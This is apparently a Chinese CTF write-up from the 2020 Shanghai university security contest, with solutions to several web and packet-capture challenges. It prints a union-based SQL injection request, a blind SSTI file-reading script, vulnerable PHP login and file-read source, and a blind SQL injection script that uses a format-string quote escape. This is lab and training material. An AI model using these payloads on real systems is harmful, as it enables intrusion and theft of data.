2020上海市大学生网络安全大赛部分wp

2020上海市大学生网络安全大赛部分wp

千毒网盘

这题很迷,开始时候扫了一次,没有扫出来www.zip,后来就扫出来了

image-20201114193038409

有一个变量覆盖,过滤了' union等,大致思路是通过第一个循环将$_POST['code']NULL掉,通过filter()的过滤,然后通过extract($_GET,EXTR_SKIP);,给$_POST['code']重新赋值,进行注入,之后就是常规的联合注入了

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
POST /index.php?_POST[code]=114514'%20and%200%20union%20select%20user(),1,flag/**/from/**/flag%23 HTTP/1.1
Host: eci-2zehpt4jc1z3lyl83iz5.cloudeci1.ichunqiu.com
Pragma: no-cache
Cache-Control: no-cache
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: UM_distinctid=1755a6e9ee915c-054346254fd387-303464-168000-1755a6e9eeaab8; chkphone=acWxNpxhQpDiAchhNuSnEqyiQuDIO0O0O;_POST[code]=1145
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 9

code=1145

image-20201114193454149

Hello

读完源码可知,404页面有SSTI,fuzz读文件,这里可以通过/proc/self/fd/3读到删除的文件

然后用脚本盲注

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
# -*- coding: utf-8 -*-
import requests


url = 'http://eci-2zegdefmmywv7mh25iet.cloudeci1.ichunqiu.com:8888/eee'

def check(payload):
    postdata = payload
    r = requests.post(url, data=postdata,headers={'Content-Type':'application/json'}).content
    return '1' in r

password  = ''
s = r'0123456789abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ{}-%'

for i in xrange(0,100):
    for c in s:
        #{%if().__class__.__base__.__subclasses__()[75].__init__.__globals__.__builtins__['open']('/proc/self/fd/3').read()[:5]=="flag{" %}1{% endif %}
        payload = '{% if ().__class__.__base__.__subclasses__()[75].__init__.__globals__.__builtins__[\'open\'](\'/proc/self/fd/3\').read()['+str(i)+':'+str(i+1)+'] == "'+c+'" %}1{% endif %}'
        if check(payload):
            password += c
            print(password)
            break
    print(password)

image-20201114194157205

TryToLogin

都配置文件

image-20201114194615848

得到网站根目录,读文件

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
//index.php
<?php
            include 'class.php';

            if(isset($_GET['file'])){

                if(preg_match('/flag/is', $_GET['file']) === 0){
                    echo file_get_contents('/'.$_GET['file']);
                }
            }

            if(isset($_POST['password'])){
                $user = new user;
                $login = $user->login();
                if($login){
                    echo <<<EOF
                    <br>
                    <div class="container">
                        <div class="row clearfix">
                            <div class="col-md-12 column">
                                <div class="alert alert-dismissable alert-info">
                                    <button type="button" class="close" data-dismiss="alert" aria-hidden="true">×</button>
                                    <h4>
                                        恭喜!
                                    </h4> <strong>Success!</strong>登录成功了!
                                </div>
                            </div>
                        </div>
                    </div>
EOF;
                }else{
                    echo <<<EOF
                    <br>
                    <div class="container">
                        <div class="row clearfix">
                            <div class="col-md-12 column">
                                <div class="alert alert-dismissable alert-danger">
                                    <button type="button" class="close" data-dismiss="alert" aria-hidden="true">×</button>
                                    <h4>
                                        注意!
                                    </h4> <strong>Wrong!</strong>用户名或密码错误!Need help?
                                </div>
                            </div>
                        </div>
                    </div>
                    
                    <!-- /?file=xxx 请使用绝对路径-->
EOF;
                }

            }
            ?>
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
//class.php
<?php   
class user
{
    public $hostname = '127.0.0.1';
    public $username = 'root';
    public $password = 'qwertyu';
    public $database = 'test';
    private $mysqli = null;

    public function __construct()
    {
        $this->mysqli = mysqli_connect(
            $this->hostname,
            $this->username,
            $this->password
        );
        mysqli_select_db($this->mysqli,$this->database);
    }

    public function filter() 
    {
        $_POST['username'] = addslashes($_POST['username']);
        $_POST['password'] = addslashes($_POST['password']);
        $safe1 = preg_match('/inn|or/is', $_POST['username']);
        $safe2 = preg_match('/inn|or/is', $_POST['password']);
        if($safe1 === 0 and $safe2 === 0){
            return true;
        }else{
            die('No hacker!');
        }	    
    }

    public function login()
    {
        $this->filter();
        $username = $_POST['username'];
        $password = $_POST['password'];
        $sql = "select * from user where username='%s' and password='$password'";
        $sql = sprintf($sql,$username);
        print_r($sql);
        $result = mysqli_query($this->mysqli,$sql);
        $result = mysqli_fetch_object($result);
        if($result->id){
            return 1;
        }else{
            return 0;
        }

    }

}

session_start();

读文件可得,sql注入格式化,逃逸单引号,bypass or,然后无列名注入,得到flag。

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
# encoding=utf-8
import requests
import time

url="http://eci-2zejdvvwkqa12mptvclx.cloudeci1.ichunqiu.com/index.php"
proxies = {
  		"http": "http://127.0.0.1:8080",
		}
flag=""

#erfenfa
for i in range(1,50):
	high = 127
	low = 32
	mid = (low + high) // 2
	while high > low:
		#payload=r"id=\\0&path=or 1=(ascii(mid(CONCAT_WS(CHAR(32,58,32),user(),database(),version()),{},1))>{})--+" #65
		#payload=r"id=\\0&path=or 1=(ascii(mid((select/**/group_concat(column_NAME)/**/from/**/information_schema.columnS/**/where/**/table_schema=database()),{},1))>{})--+"
		payload=r"type=2&imei=\" and if((ascii(mid((select password from users limit 1 offset 0),{},1))>{}),benchmark(1000000,sha(1)),0)#"
		payload="type=2&imei=\" and if((ascii(mid((user()),{},1))>{}),benchmark(1000000,sha(1)),0)#"
		payload="(ascii(mid((select/**/group_concat(table_name)from sys.schema_table_statistics_with_buffer where table_schema=database()),{},1))>{})"
		payload="(ascii(mid((select x.1 from(select 1 union select * from fl4g)x limit 1,1),{},1))>{})"
		#payload="(ascii(mid((select username ),{},1))>{})"
		url_1=url
		data = {"username":"admin","password":"%1$' || "+payload.format(i,mid)+"#"}
		r=requests.post(url_1,data=data,proxies=proxies)
		#print(r.content)
		if "Success!" in r.text:
			low=mid+1
		else:
			high=mid
		mid=(low+high)//2
	flag+=chr(mid)
	print(flag) 
#(select x.2 from(select 1,2,3 union select * from user)x)

image-20201114195244441

pcap

用wireshark打开,筛选出DNP3.0协议,追踪流发现规律

image-20201114194124842

然后写脚本跑

image-20201114194347238

pcap analysis

和上题一样

image-20201114194531922

直接手敲。。。。